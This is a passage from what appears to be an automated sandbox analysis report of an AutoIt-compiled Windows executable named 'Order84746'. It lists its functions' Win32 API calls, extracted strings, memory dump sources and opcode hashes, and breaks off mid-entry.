                          • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0091EB45
                          • GetWindowRect.USER32(?,?), ref: 0091EB4E
                          • SetWindowTextW.USER32(?,?), ref: 0091EBB9
                          • GetDesktopWindow.USER32 ref: 0091EBBF
                          • GetWindowRect.USER32(00000000), ref: 0091EBC6
                          • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0091EC12
                          • GetClientRect.USER32(?,?), ref: 0091EC1F
                          • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0091EC44
                          • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0091EC6F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                          • String ID:
                          • API String ID: 3869813825-0
                          • Opcode ID: c7f49c9e8c6bf87105ddf18848e92615e1da61a65119b0502ccb55b37a45125e
                          • Instruction ID: d752b81e091eb52d691ba8547b8497039abd0560fdb7f2ce27d2b3423e4d891a
                          • Opcode Fuzzy Hash: c7f49c9e8c6bf87105ddf18848e92615e1da61a65119b0502ccb55b37a45125e
                          • Instruction Fuzzy Hash: 91514E71A04709AFDB20DFA9CD89FAEBBF9FF04704F00492CE596A25A0C774A944DB50
                          Function 009379B0 Relevance: 25.6, APIs: 17, Instructions: 109COMMON
                          Download Yara Rule
                          APIs
                          • LoadCursorW.USER32(00000000,00007F8A), ref: 009379C6
                          • LoadCursorW.USER32(00000000,00007F00), ref: 009379D1
                          • LoadCursorW.USER32(00000000,00007F03), ref: 009379DC
                          • LoadCursorW.USER32(00000000,00007F8B), ref: 009379E7
                          • LoadCursorW.USER32(00000000,00007F01), ref: 009379F2
                          • LoadCursorW.USER32(00000000,00007F81), ref: 009379FD
                          • LoadCursorW.USER32(00000000,00007F88), ref: 00937A08
                          • LoadCursorW.USER32(00000000,00007F80), ref: 00937A13
                          • LoadCursorW.USER32(00000000,00007F86), ref: 00937A1E
                          • LoadCursorW.USER32(00000000,00007F83), ref: 00937A29
                          • LoadCursorW.USER32(00000000,00007F85), ref: 00937A34
                          • LoadCursorW.USER32(00000000,00007F82), ref: 00937A3F
                          • LoadCursorW.USER32(00000000,00007F84), ref: 00937A4A
                          • LoadCursorW.USER32(00000000,00007F04), ref: 00937A55
                          • LoadCursorW.USER32(00000000,00007F02), ref: 00937A60
                          • LoadCursorW.USER32(00000000,00007F89), ref: 00937A6B
                          • GetCursorInfo.USER32(?), ref: 00937A7B
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Cursor$Load$Info
                          • String ID:
                          • API String ID: 2577412497-0
                          • Opcode ID: d939d244fea7fb9e7002cd7490e23b68359bf52f1a92e44f5976dce5a36bb911
                          • Instruction ID: 58e8eb559c20553bbbdf4a88c2109c8a94c5246af88b5270ea81059427b4c51d
                          • Opcode Fuzzy Hash: d939d244fea7fb9e7002cd7490e23b68359bf52f1a92e44f5976dce5a36bb911
                          • Instruction Fuzzy Hash: 6131D4B1D4831E6ADB609FB68C8995FFEECFF04754F50452AE50DE7280DA78A5008FA1
                          Function 008EC833 Relevance: 25.0, APIs: 7, Strings: 7, Instructions: 479COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 008FE968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,008EC8B7,?,00002000,?,?,00000000,?,008E419E,?,?,?,0097DC00), ref: 008FE984
                            • Part of subcall function 008E660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008E53B1,?,?,008E61FF,?,00000000,00000001,00000000), ref: 008E662F
                          • __wsplitpath.LIBCMT ref: 008EC93E
                            • Part of subcall function 00901DFC: __wsplitpath_helper.LIBCMT ref: 00901E3C
                          • _wcscpy.LIBCMT ref: 008EC953
                          • _wcscat.LIBCMT ref: 008EC968
                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 008EC978
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 008ECABE
                            • Part of subcall function 008EB337: _wcscpy.LIBCMT ref: 008EB36F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                          • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                          • API String ID: 2258743419-1018226102
                          • Opcode ID: ad2139766afc07b2a85c0050440cab2ac5a702130d1b4ad0c37e0deb034df4b7
                          • Instruction ID: f07f70802d95d8505d37ccdae68a2524a7725681ce602619a7a9a1ee40c7a8bf
                          • Opcode Fuzzy Hash: ad2139766afc07b2a85c0050440cab2ac5a702130d1b4ad0c37e0deb034df4b7
                          • Instruction Fuzzy Hash: 9A127A715083819FC724EF29C841AAEBBE4FFD9354F40492DF989932A1DB309A49CB53
                          Function 0094CE58 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 0094CEFB
                          • DestroyWindow.USER32(?,?), ref: 0094CF73
                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0094CFF4
                          • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0094D016
                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0094D025
                          • DestroyWindow.USER32(?), ref: 0094D042
                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,008E0000,00000000), ref: 0094D075
                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0094D094
                          • GetDesktopWindow.USER32 ref: 0094D0A9
                          • GetWindowRect.USER32(00000000), ref: 0094D0B0
                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0094D0C2
                          • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0094D0DA
                            • Part of subcall function 008FB526: GetWindowLongW.USER32(?,000000EB), ref: 008FB537
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                          • String ID: 0$tooltips_class32
                          • API String ID: 3877571568-3619404913
                          • Opcode ID: 450072770c7ba953c4a4eaa46e8800cb2ca90434b8c99a735286ae2d3df51db7
                          • Instruction ID: 2822b30f8522540a8105a1667a412540cc4c3887fea815598571e3b6e37152a7
                          • Opcode Fuzzy Hash: 450072770c7ba953c4a4eaa46e8800cb2ca90434b8c99a735286ae2d3df51db7
                          • Instruction Fuzzy Hash: C071EEB4655305AFDB20CF28CC84F6A37E9FB89704F08451DF985872A1D774E842DB62
                          Function 0092AAF8 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 374timeCOMMON
                          Download Yara Rule
                          APIs
                          • VariantInit.OLEAUT32(00000000), ref: 0092AB3D
                          • VariantCopy.OLEAUT32(?,?), ref: 0092AB46
                          • VariantClear.OLEAUT32(?), ref: 0092AB52
                          • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0092AC40
                          • __swprintf.LIBCMT ref: 0092AC70
                          • VarR8FromDec.OLEAUT32(?,?), ref: 0092AC9C
                          • VariantInit.OLEAUT32(?), ref: 0092AD4D
                          • SysFreeString.OLEAUT32(00000016), ref: 0092ADDF
                          • VariantClear.OLEAUT32(?), ref: 0092AE35
                          • VariantClear.OLEAUT32(?), ref: 0092AE44
                          • VariantInit.OLEAUT32(00000000), ref: 0092AE80
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                          • String ID: %4d%02d%02d%02d%02d%02d$Default
                          • API String ID: 3730832054-3931177956
                          • Opcode ID: 123e9de2ddd2911c2013ff0834087d11261afef0bcb1f72eee099d6bdd5c2dd9
                          • Instruction ID: 1281b29810b4630333027111c5b61f5a29495d5aa5f28c4f5f231c9119d8776c
                          • Opcode Fuzzy Hash: 123e9de2ddd2911c2013ff0834087d11261afef0bcb1f72eee099d6bdd5c2dd9
                          • Instruction Fuzzy Hash: 24D1F372A04225DFDB109F69E884B79B7B9FF04B00F148895E415DB199DB78EC40DBA3
                          Function 0094716A Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON
                          Download Yara Rule
                          APIs
                          • CharUpperBuffW.USER32(?,?), ref: 009471FC
                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00947247
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: BuffCharMessageSendUpper
                          • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                          • API String ID: 3974292440-4258414348
                          • Opcode ID: 1411d00b3466548ebf8b301c6c9eacc7e400a99b82ed1f0fb0279369ccb3c60a
                          • Instruction ID: dd4e76c1c857139cc027ff9a444199cb2479e9b34020b4a25591c86aed2e8af0
                          • Opcode Fuzzy Hash: 1411d00b3466548ebf8b301c6c9eacc7e400a99b82ed1f0fb0279369ccb3c60a
                          • Instruction Fuzzy Hash: 55917D702087459BCB14EF68C851A6EF7A5FF85310F004858F9969B3A3DB74ED4ACB92
                          Function 0094E4F5 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON
                          Download Yara Rule
                          APIs
                          • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0094E5AB
                          • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00949808,?), ref: 0094E607
                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0094E647
                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0094E68C
                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0094E6C3
                          • FreeLibrary.KERNEL32(?,00000004,?,?,?,00949808,?), ref: 0094E6CF
                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0094E6DF
                          • DestroyCursor.USER32(?), ref: 0094E6EE
                          • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0094E70B
                          • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0094E717
                            • Part of subcall function 00900FA7: __wcsicmp_l.LIBCMT ref: 00901030
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
                          • String ID: .dll$.exe$.icl
                          • API String ID: 3907162815-1154884017
                          • Opcode ID: cca6da1d3fcf131b281e5bc2dccdb9ac7c495b74cc003558b408b553913f5959
                          • Instruction ID: 021fd7e900d3830c62ae93952fdfe5d7bede1393b1a27864aa1e0abd6647ea36
                          • Opcode Fuzzy Hash: cca6da1d3fcf131b281e5bc2dccdb9ac7c495b74cc003558b408b553913f5959
                          • Instruction Fuzzy Hash: 0A61B071A10215BEEB24DF68CC46FBE7BACBB18724F104505F925D61D1EBB4A980DBA0
                          Function 0092D219 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 008E936C: __swprintf.LIBCMT ref: 008E93AB
                            • Part of subcall function 008E936C: __itow.LIBCMT ref: 008E93DF
                          • CharLowerBuffW.USER32(?,?), ref: 0092D292
                          • GetDriveTypeW.KERNEL32 ref: 0092D2DF
                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0092D327
                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0092D35E
                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0092D38C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                          • API String ID: 1148790751-4113822522
                          • Opcode ID: cb021a2769aa8e5875893cd9b4d48983284ed35f3596e2a1ac9a9f364707b85c
                          • Instruction ID: bc32713e962321caf1e3d3ffaa312e7b2db0263e815f011e501ec76ba90e036d
                          • Opcode Fuzzy Hash: cb021a2769aa8e5875893cd9b4d48983284ed35f3596e2a1ac9a9f364707b85c
                          • Instruction Fuzzy Hash: A8515E715043459FC700EF29D88196EB7E8FF99758F00886DF895A72A1DB31EE06CB92
                          Function 009226BC Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 137windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00953973,00000016,0000138C,00000016,?,00000016,0097DDB4,00000000,?), ref: 009226F1
                          • LoadStringW.USER32(00000000,?,00953973,00000016), ref: 009226FA
                          • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00953973,00000016,0000138C,00000016,?,00000016,0097DDB4,00000000,?,00000016), ref: 0092271C
                          • LoadStringW.USER32(00000000,?,00953973,00000016), ref: 0092271F
                          • __swprintf.LIBCMT ref: 0092276F
                          • __swprintf.LIBCMT ref: 00922780
                          • _wprintf.LIBCMT ref: 00922829
                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00922840
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                          • API String ID: 618562835-2268648507
                          • Opcode ID: 7b2a7b7ebff5a86a7bb7c50d13b213703ebb74538c6eb4e8785b228ed6f2c9c9
                          • Instruction ID: b9e629cd53441edc33164294c2f5b17bbafb49322d6d3b1c564b011b1a9df754
                          • Opcode Fuzzy Hash: 7b2a7b7ebff5a86a7bb7c50d13b213703ebb74538c6eb4e8785b228ed6f2c9c9
                          • Instruction Fuzzy Hash: AD414E72800259BACB14FBE9DD86EEEB778FF56344F500065F501B2092EA70AF09DB61
                          Function 0092D0B8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101fileCOMMON
                          Download Yara Rule
                          APIs
                          • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0092D0D8
                          • __swprintf.LIBCMT ref: 0092D0FA
                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 0092D137
                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0092D15C
                          • _memset.LIBCMT ref: 0092D17B
                          • _wcsncpy.LIBCMT ref: 0092D1B7
                          • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0092D1EC
                          • CloseHandle.KERNEL32(00000000), ref: 0092D1F7
                          • RemoveDirectoryW.KERNEL32(?), ref: 0092D200
                          • CloseHandle.KERNEL32(00000000), ref: 0092D20A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                          • String ID: :$\$\??\%s
                          • API String ID: 2733774712-3457252023
                          • Opcode ID: 80300672269ca4ff26fce380a1cba2ce4441b0da9cdf35be77bd365b3e8eca6e
                          • Instruction ID: dda201301555eb298c9f8bdc89bb77540a5dc07e3494e1535e00bdc5f6a68d93
                          • Opcode Fuzzy Hash: 80300672269ca4ff26fce380a1cba2ce4441b0da9cdf35be77bd365b3e8eca6e
                          • Instruction Fuzzy Hash: C031C1B2A15119ABDB20DFA0DC48FEB37BCEF89740F1040BAF519D21A5E77096448B24
                          Function 009187CD Relevance: 22.7, APIs: 15, Instructions: 210COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                          • String ID:
                          • API String ID: 884005220-0
                          • Opcode ID: b92e18b4737de4d50774051b1bdfd5c05ddb7584a6bb9841603ebc895777c4ee
                          • Instruction ID: a3814a84eaa506322a499578c85ba036811166d4e67f46d33194fcfbdcc7f716
                          • Opcode Fuzzy Hash: b92e18b4737de4d50774051b1bdfd5c05ddb7584a6bb9841603ebc895777c4ee
                          • Instruction Fuzzy Hash: 44611472B08319AFEB206F64DC417FB37A8EF85364F600565E865AB1C0DF34D980A795
                          Function 0094E731 Relevance: 22.6, APIs: 15, Instructions: 129filecommemoryCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 0094E754
                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0094E76B
                          • GlobalAlloc.KERNEL32(00000002,00000000), ref: 0094E776
                          • CloseHandle.KERNEL32(00000000), ref: 0094E783
                          • GlobalLock.KERNEL32(00000000), ref: 0094E78C
                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0094E79B
                          • GlobalUnlock.KERNEL32(00000000), ref: 0094E7A4
                          • CloseHandle.KERNEL32(00000000), ref: 0094E7AB
                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0094E7BC
                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,0096D9BC,?), ref: 0094E7D5
                          • GlobalFree.KERNEL32(00000000), ref: 0094E7E5
                          • GetObjectW.GDI32(?,00000018,000000FF), ref: 0094E809
                          • CopyImage.USER32(?,00000000,?,?,00002000), ref: 0094E834
                          • DeleteObject.GDI32(00000000), ref: 0094E85C
                          • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0094E872
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                          • String ID:
                          • API String ID: 3840717409-0
                          • Opcode ID: ddde88fecdf982f806a9021db4855f1d0d7f818cd28ce971a2134384f9379b05
                          • Instruction ID: b5be81e4e4bcec9bb3055326db7cfb64301a8cc10f33cc6d8d417c33951acf6c
